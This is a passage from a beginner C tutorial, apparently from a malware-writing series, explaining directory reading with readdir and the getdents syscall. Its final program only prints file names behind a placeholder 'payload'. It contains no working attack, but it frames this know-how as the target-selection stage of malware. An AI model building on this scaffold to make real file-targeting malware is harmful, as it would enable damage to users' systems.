233 | In this example we do not know how long the name of the directory entry will be. When this happens we usually have two options. We either provide enough space so the longest possible name will fit in our memory block (and/or we limit the longest possible name with additional checks in the code), or we dynamically allocate space for the directory entry whenever we find out its size. Allocations just don't happen magically... even in interpreted languages all these processes are happening under the hood... whenever you add two strings in python a lot of allocation and memory movement happens.
234 | 
235 | Let's see how this would work. Imagine we are allocating our structure in the stack. Note that the actual memory block is created/managed by the `readdir` function, not by us. The function gives us a pointer to the memory it manages/allocates. As, for the time being, we only know how to allocate memory in the stack, let's assume `readdir` allocates memory in the stack, however it is likely to use some global storage or the heap. You should have an idea of the why at this point.
236 | 
237 | Also, let's assume that the syscalls used by `readdir` (remember `readdir` is a libc function not a system call) will let us know the size of the file name it is reporting. Let's imagine the length of the filename is `len`.
238 | 
239 | Then `readdir` will allocate in the stack 24 bytes + len, so there is enough space to store the `struct linux_dirent` fields plus the string. In this case the stack will look like this:
240 | 
241 |     ADDRS+18+len -> | \0
242 |     ADDRS+18     -> | d_name (the string goes here)
243 |     ADDRS+16     -> | d_reclen (2 bytes) 
244 |     ADDRS+8      -> | d_off    (8 bytes) 
245 |     ADDRS       --> | d_ino    (8 bytes)
246 |                     +--------------
247 | 
248 | Whenever we access the `d_name` field that is located at `ADDR+18`, we will find a variable length string containing the name of the file being read by `readdir`.
249 | 
250 | From a syntactic point of view `char d_name[]` represents a character string of unknown size. In practise it is just indicating the offset in the memory block holding the structure where the string will be.
251 | 
252 | This technique is also sometimes used in network programming when the length of the packet is unknown until the packet header is read and the field containing the packet size can be read.
253 | 
254 | # Reading the directory
255 | 
256 | Now that we know what a `struct` is, we can start using `readdir`. This function returns a pointer to a `struct dirent`. This type is defined in `#include <dirent.h>` and, as you have already figured out, the name comes from _DIRectory ENTry_.
257 | 
258 | So, each time we run `readdir` we will get the information of one of the files in the directory. We have to call it again and again until the whole directory is read. So, the question is: when should we stop?. Well, the answer, is in the `man` pages. Never underestimate the amount of information provided by the man pages. So this is what it says:
259 | 
260 |     RETURN VALUE
261 |            On  success, readdir() returns a pointer to a dirent structure.  (This structure
262 |            may be statically allocated; do not attempt to free(3) it.)
263 |     
264 |            If the end of the directory stream is reached, NULL is returned and errno is not
265 |            changed.   If  an error occurs, NULL is returned and errno is set appropriately.
266 |            To distinguish end of stream and from an error, set errno to zero before calling
267 |            readdir() and then check the value of errno if NULL is returned.
268 | 
269 | 
270 | Crystal clear. Now we can recall the main loop in our `select_target` function and look at it again:
271 | 
272 | ```C
273 |   while (1) {
274 |       errno = 0;
275 |       if (!(de = readdir (d))) {
276 | 	    if (errno) perror ("readdir:");
277 | 	    break;
278 |       }
279 |       pf (de->d_name);
280 |     }
281 | ```
282 | 
283 | We had already introduced the `while` loop in the past. It just loops _while_ the condition we set in the `while` is true. In this case, `while(1)` means that the loop will run forever, because the condition is always true (!= 0).
284 | 
285 | _NOTE: C doesn't have a boolean type. Conditional operators traditionally return FALSE as 0 and TRUE as not zero. Setting the while condition to 1  means that it is always true. You could set it to 31173 and it will work the same, but why would you type 5 numbers when you can just type 1?._
286 | 
287 | Then we are prepared to call `readdir`. We set `errno` to zero as proposed in the man page and call the function. If we get a `NULL` we fall into the `if`. Then we check the `errno` variable again and, if it has changed, we show an error. In either case, whether we had an error or we have reached the end of the list, we leave the while loop using `break`.
288 | 
289 | >NOTE: The expression we use above `if (!p)` is equivalent to `if (p == 0)` or if you prefer `if (p == NULL)`, the compiler will see that `p` is a pointer and will change 0 to a compatible representation of `NULL`. The way to write this is a matter of personal taste and some people say `if (!p)` is bad style, and some others say it is good.... Just do whatever suits you better, but be aware of what is going on under the hood. The key point here is that NULL is a special value and its internal representation doesn't need to be the integer 0. This may be confusing for the beginner. You can take a look at [the c faq NULL section](http://c-faq.com/null/) for details.
290 | 
291 | Otherwise, we access the field `d_name` in the struct `struct dirent` that contains the name of the directory entry returned by `readdir` and pass it to the `payload` function. 
292 | 
293 | # Reading directories with system calls
294 | 
295 | We have a working function able to read the content of a directory in the disk using the POSIX interface. Overall, when writing malware we would like to minimise application dependencies and in the extreme case that implies just using the OS and avoid all libraries... However this is not always possible.
296 | 
297 | In this case, instead of using the POSIX function we can use the associated Linux system call. This is perfectly fine, however the drawback is that the POSIX version will work with all POSIX compatible operating systems and the non-POSIX version will be Linux specific. In other words, all POSIX compatible systems have the `opendir/readdir/closedir` functions but each one will have different system calls to access the directories. That is what standards are for.
298 | 
299 | > NOTE: The fact that our program will work on any POSIX compliant system (Linux, NetBSD, OpenBSD, Solaris, macOS...) means that we can recompile it for those systems and the program will still work. It doesn't mean that any compiled version of our program will magically run on all POSIX compliant OSes.
300 | 
301 | > NOTE2: Linux is not officially POSIX compliant. Despite possible minor divergences, the main issue is that POSIX certification, like most certifications out there, is really achieved by paying a fee...
302 | 
303 | Anyhow, malware is usually target specific (platform-wise) and getting rid of the standard libc will make our program very small and give us much more control on what is in it and what is not.
304 | 
305 | So, the system call that we have to use is known as `getdents`. Sure, you got it, it stands for _GET Directory ENTries_. There is a man page for it and it says that there is no wrapper provided by libc, so we have to write our own if we want to use it (the man page already says how to do that):
306 | 
307 | 
308 | ```C
309 | #include <sys/syscall.h>
310 | 
311 | int getdents (int fd, char *buf, int len)
312 | { return syscall (SYS_getdents, fd, buf, len); }
313 | ```
314 | 
315 | We will not go all the way down to the kernel right now. We implement it using the `syscall` standard function instead of invoking the `syscall` processor instruction directly so we can still use C code and we do not need to start adding assembler at this point. We will get to that a bit later.
316 | 
317 | In order to use this function, we need a file descriptor for the directory. We can get this using the standard `open` system call. This will do the trick:
318 | 
319 | ```C
320 | int select_target (PAYLOAD_FUNC pf) {
321 |   char                buf[BUF_SIZE];
322 |   struct linux_dirent *de;
323 |   int                 fd, n, i;
324 |   
325 |   // Open directory using open
326 |   if ((fd = open (folder, O_RDONLY | O_DIRECTORY)) < 0) exit (1);
327 | 
328 |   while (1) {
329 |     // Read directory entries
330 |     }
331 |   }
332 |   close (fd);
333 |   return 0;
334 | ```
335 | 
336 | At this level, we manage the directory exactly the same way as a file. We `open` it... and we `close` it whenever we are done. Now it is time to see how to use `getdents`.
337 | 
338 | ## Using `getdents`
339 | The `getdents` prototype is as follows:
340 | 
341 |     int getdents(unsigned int fd, struct linux_dirent *dirp, unsigned int count);
342 | 
343 | It receives as parameters a file descriptor (the one we got from the call to `open` with flag `O_DIRECTORY`), then a pointer to a `struct linux_dirent` (actually a pseudo-array of items of this type) and finally the size of the buffer we pass as the second parameter. You will understand this in a second.
344 | 
345 | As you can see the second parameter is of type `struct linux_dirent` instead of the `struct dirent` that we used with the POSIX version. These structures are slightly different, but we can get them from the man pages of the `readdir` function and `getdents` system call respectively. Anyway we had already introduced it previously when we talked about `structs`.
346 | 
347 | So, how does `getdents` work? It doesn't return just one directory entry... it returns as many as will fit in the buffer we pass as second parameter, and that number will vary depending on..... Yes sure, on the length of the name of each entry. So the return value (the number of bytes read) is important in order to extract the information.
348 | 
349 | The man page also includes example code on how to use the system call. I will include here a simplified version to explain how this syscall works:
350 | 
351 | ```C
352 |   char                buf[BUF_SIZE];
353 |   struct linux_dirent *de;
354 |   int                 fd, n, i;
355 | (...)
356 |   while (1) {
357 |     n = getdents (fd, buf, BUF_SIZE);
358 |     if (n < 0) exit (1);
359 |     if (n == 0) break;
360 | 
361 |     // Build file name
362 |     for (i = 0; i < n;) {
363 |       de = (struct linux_dirent *)(buf + i);
364 |       
365 | 	pf (de->d_name);
366 |     i += de->d_reclen;
367 |   }
368 | ```
369 | 
370 | 
371 | First we call the syscall and process errors and end condition. And after that we have to process all the entries reported by the syscall...and we do not know how many are there. That number will depend on the size of the buffer we pass to the syscall. So we run our loop over bytes and not over `struct linux_dirent` items because we do not know the size of each entry in the array (actually this is why it is not really an array). 
372 | 
373 | The variable `n` contains the number of bytes read by `getdents`.
374 | 
375 | The first entry will be at offset zero of our buffer. We access it by casting our general buffer to the structure, do what we want to do and then we increase the offset by the size of the directory entry, which is stored in the field `d_reclen`. This will update the offset in the buffer to point to the next entry and we repeat the process.
376 | 
377 | >NOTE: Casting a pointer is just forcing it into some type. This only makes sense for the compiler. In reality, the memory is the same, regardless of the cast operation we apply. Casting will allow us to tweak our view of a given memory block. Imagine our memory block is 16 bytes. We can see it as 16 `unsigned chars`, 8 `shorts`, 4 `ints` or 2 `longs` (or 2 `long longs`, which are also 8 bytes on 64-bit Linux). The memory block will have the same content but in our program the values that we will get after casting will be different.
378 | > 
379 | > Example: 
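380 | > An 8-byte memory block at address `addr` contains the bytes below. (The values in the comments assume big-endian byte order; on a little-endian machine such as x86 the bytes of each multi-byte value appear reversed.)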
381 | >
382 | >     addr =  | 0x00 | 0x01 | 0x02 | 0x03 | 0x04 | 0x05 | 0x06 | 0x07 | 
383 | >```C
384 | > long *l = (long *) addr; // l[0] or *l will be 0x0001020304050607
385 | > int  *i = (int  *) addr; // i[0] or *i will be 0x00010203 and i[1] or *(i+1) = 0x04050607
386 | > char *c = (char *) addr; // c[0] = 0x00, c[1]= 0x01, .... c[7] = 0x07
387 | > ```
388 | 
389 | Let's see this with an example. Imagine a folder containing just a file named `a.txt`. This is what `getdents` will return in the buffer:
390 | 
391 |     buf+65     -> | inode
392 |                   +-------------- 
393 |     buf+59     -> | a.txt\0
394 |     buf+57     -> | 24
395 |     buf+49     -> | offset
396 |     buf+41     -> | inode
397 |                   +--------------
398 |     buf+38     -> | ..\0
399 |     buf+36     -> | 21 
400 |     buf+28     -> | offset
401 |     buf+20     -> | inode  <----------+-- addr + 20
402 |                   +--------------     |           ^
403 |     buf+18     -> | .\0               |           |
404 |     buf+16     -> | 20     -----------+-----------+
405 |     buf+8      -> | offset            |
406 |     buf       --> | inode  <----------+--- addr
407 |                   +--------------
408 | 
409 | _NOTE: According to the man page, the offset is the distance from the start of the directory to the next dirent struct, however after printing the values I get on my test program those numbers look strange. I may need to double check, but it may be related to the actual EXT3 filesystem that stores the directories as linked lists. For the time being we can use `d_reclen` to deal with the buffer returned by `getdents`, and ignore `d_off`_
410 | 
411 | As you can see we always get the current (`.`) and the parent ( `..`) directories and then the rest of files. In this case we only have an extra file and our 1024 bytes buffer will be mostly empty after reading the whole folder. A directory containing many files may fill the buffer completely and we may need to call `getdents` again to keep reading the directory.
412 | 
413 | # Opaque data types. The `DIR` struct
414 | 
415 | Now we could figure out what is in the `DIR` type we used with the POSIX interface. It is not that we need that, but figuring out these kinds of things will boost your learning... so it is up to you to skip this section or not.
416 | 
417 | The `DIR` type is a so-called opaque data type in the sense that the programmer (that is us) cannot see what is in it. Compare this to the `struct dirent` we have been using in our examples, where we can see the different fields and we actually need to use them.
418 | 
419 | Opaque data types are used together with an API that does what we need so we do not need to access the structure directly. This has the advantage that new versions of the SW may change the internal structure of the data type and, as long as the API doesn't change, our program will still work. This concept is known generically as _Encapsulation_.
420 | 
421 | Making a structure opaque is just a matter of not exposing the internal structure. That means the structure is not defined in the .h files available to the programmer. We will see how to do this later. For the time being this is not relevant.
422 | 
423 | So, with all the information we have, and after learning how to use the POSIX API we can figure out what is in this `DIR` data type and also how to implement the different functions. The structure would be more or less like:
424 | 
425 | ```C
426 | typedef struct __my_dirstream {
427 | 	int      fd;             // File descriptor returned by open. Required by getdent
428 | 	char     buf[BUF_SIZE];  // Buffer to read directory entries (to call getdent)
429 | 	int      n;              // Number of bytes to process
430 | 	int      off;            // Number of bytes already processed
431 | } MY_DIR;
432 | ```
433 | 
434 | I will leave as an exercise to the reader the implementation of the POSIX interface using `open/getdents/close`. It is a nice exercise to get more fluent with the C programming language. Just do it, it is pretty straightforward with all the information we have learnt so far and will help you to get comfortable with C... you may need to add more fields to the structure above depending on how you implement the API.
435 | 
436 | # The final version
437 | Just for your convenience this is the final complete version of our directory listing program:
438 | 
439 | ```C
440 | #define _GNU_SOURCE  // Needed by syscall
441 | #include <stdio.h>
442 | #include <stdlib.h>
443 | #include <string.h>
444 | 
445 | #include <unistd.h>
446 | #include <fcntl.h>
447 | #include <sys/types.h>  
448 | #include <sys/stat.h>   // Stat systemcall
449 | 
450 | #include <sys/syscall.h>
451 | 
452 | #define BUF_SIZE 1024
453 | 
454 | #define MFW_EXIT(s) do {perror (s); exit (EXIT_FAILURE);} while (0)
455 | 
456 | // Dirent Data struct
457 | struct linux_dirent {
458 |   long           d_ino;
459 |   off_t          d_off;
460 |   unsigned short d_reclen;
461 |   char           d_name[];
462 | };
463 | 
464 | 
465 | char folder[1024];
466 | 
467 | // getdent wrapper. Not provided by glibc
468 | int getdents (int fd, char *buf, int len)
469 | { return syscall (SYS_getdents, fd, buf, len); }
470 | 
471 | typedef int (*PAYLOAD_FUNC)(char *);
472 | 
473 | int payload (char *target) {
474 |   printf ("Doing malware things to %s\n", target);
475 | }
476 | 
477 | int select_target (PAYLOAD_FUNC pf) {
478 |   char                buf[BUF_SIZE];
479 |   struct linux_dirent *de;
480 |   struct stat         st;
481 |   int                 fd, n, i;
482 |   
483 |   // Open directory using open
484 |   if ((fd = open (folder, O_RDONLY | O_DIRECTORY)) < 0) MFW_EXIT("open:");
485 | 
486 |   while (1) {
487 |     n = getdents (fd, buf, BUF_SIZE);
488 |     if (n < 0) MFW_EXIT ("getdents:");
489 |     if (n == 0) break;
490 | 
491 |     for (i = 0; i < n;) {
492 |       de = (struct linux_dirent *)(buf + i);
493 | 	  pf (de->d_name);
494 |       i += de->d_reclen;
495 |     }
496 |   }
497 |   close (fd);
498 |   return 0;
499 | }
500 | 
501 | int main (int argc, char *argv[]) {
502 |   strcpy (folder, argv[1]);
503 |   while (select_target(payload));
504 | }
505 | 
506 | ```
507 | 
508 | It has some minor changes and all the required includes and defines. I would recommend going through it and trying to understand the stuff that is not described in this text. Do not hesitate to ask in the comments if you do not understand something.
509 | 
510 | # Conclusions
511 | 
512 | We have learnt how to read a directory using the standard POSIX interface and also using system calls. We have also learnt about function pointers and `structs`. A lot of stuff to digest. I know.
513 | 
514 | This is the first step to implement the `select_target` function. The second one is to be able to determine the details of each file in the directory and thus select the target needed by each specific malware. This is what we will deal with in the next instalment.
515 | 
516 | Note that these articles are intended for newbies, so feel free to ask in the comments about any doubt. There is no stupid question when you are starting so do not be shy, I'll try to answer all of your doubts and I'm also interested in knowing if the level of the text is too easy or too hard, so your feedback will be very much appreciated.
517 | 
518 | However I would recommend first trying to answer your question by yourself, using Google, and rechecking the previous instalments. Asking without trying first is not just bad [netiquette](https://en.wikipedia.org/wiki/Etiquette_in_technology); working it out yourself is also a much better way to learn. The things you learn by yourself remain steady in your memory and broaden your view of the topic.
519 | 


--------------------------------------------------------------------------------